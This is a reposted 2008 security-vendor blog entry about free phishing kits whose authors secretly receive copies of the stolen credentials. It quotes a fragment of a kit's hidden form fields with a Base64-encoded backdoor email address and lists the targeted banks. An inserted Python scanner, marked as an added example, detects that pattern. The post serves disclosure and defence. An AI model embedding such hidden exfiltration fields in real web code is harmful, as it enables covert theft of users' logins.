Wednesday, January 30, 2008 12:20 PM
cmosby
Phishers Phished! | TrendLabs | Malware Blog - by Trend Micro
January 30th, 2008 by Jovi Umawing
The ease of use and availability of tools for malicious schemes have always been a problem for security companies, since they greatly contribute to the rapid proliferation of code and files that can affect Internet users. Web sites run by an individual or group giving away free code and software for the whole community to use as they please can be found almost anywhere.
Netcraft recently reported on a certain Mr. Brain (actually a group of Moroccan fraudsters) who recently launched a dedicated Web site offering free phishing kits that anyone can use for their phishing activities. They lure interested parties by packaging the code as “easy-to-use” and “programmer-friendly,” since only basic programming knowledge is needed to deploy a kit. Visitors to this site would hardly think twice about going for the bait, but on closer inspection it turns out that, however alluring, most good things are just too good to be true.
Parts of the code were found to reveal where the phished information actually goes once it has been collected from the phishers’ victims: although the phished information is sent to the phishers, a copy is also covertly sent back to Mr. Brain. Further analysis reveals what looks like Mr. Brain’s email address in this piece of code:
<input type="hidden" id="swich" />
<input name="user" type="hidden" />
<input name="pass" type="hidden" />
<input name="defaultaddress" type="hidden" />
<input name="ip" type="hidden" />
<input TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=");?>" name="Send" type="hidden" />
The code segment “TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=” after decoding translates to the email address where the stolen information is sent.
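For analysts triaging a kit like this one, the following added example (not code from the original post or from Trend Micro) scans kit source for Base64 literals that decode to an email address, which is the concealment pattern described above. The function name, the regexes and the 16-character minimum are assumptions of this example; the sample input is constructed from the hidden field as it appears on this page.

```python
import base64
import binascii
import re

# Runs of Base64 characters long enough to hold an address (assumed threshold).
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Constructed sample: two of the kit's hidden fields as quoted on this page.
SAMPLE = '''<input name="pass" type="hidden" />
<input TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=");?>" name="Send" type="hidden" />'''


def hidden_recipients(source):
    """Return (line_no, token, address) for each Base64 literal in `source`
    that decodes to ASCII text containing an email address."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for token in B64_RE.findall(line):
            if len(token) % 4:  # not a whole number of 4-character groups
                continue
            try:
                text = base64.b64decode(token, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue  # looked like Base64 but is not encoded text
            for address in EMAIL_RE.findall(text):
                hits.append((line_no, token, address))
    return hits


if __name__ == "__main__":
    for line_no, token, address in hidden_recipients(SAMPLE):
        print(f"line {line_no}: {token} -> {address}")
```

Any address reported this way that differs from the recipient configured in plain text elsewhere in the kit marks a second, concealed destination for the stolen data.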
Suffice it to say that the phishers who thought they had their victims didn’t know they had been had by Mr. Brain. This con saves Mr. Brain the more arduous task of hacking and compromising Web sites and deploying the phishing pages himself: clearly a classic one-upmanship the likes of which have never been seen before with regard to online theft.
Furthermore, Macalintal itemized the following banking and services establishments that could potentially be affected by the Mr. Brain phishing scheme:
- Abbey.co.uk
- BankofAmerica.com
- Chase.com
- E-Gold.com
- eBay.com
- HSBC.co.uk
- LloydsTSB.com
- MoneyBookers.com
- Nationwide.co.uk
- NBK.Com.kw
- PayPal.com
- Regions.com
- Stgeorge.com.au
- Wachovia.com
- Westernunion.com
An investigation into this operation is currently underway, and the authorities have been contacted so that proper action can be taken. Thanks to Ivan Macalintal and Robert McArdle for the information in this post.
Source: Phishers Phished! | TrendLabs | Malware Blog - by Trend Micro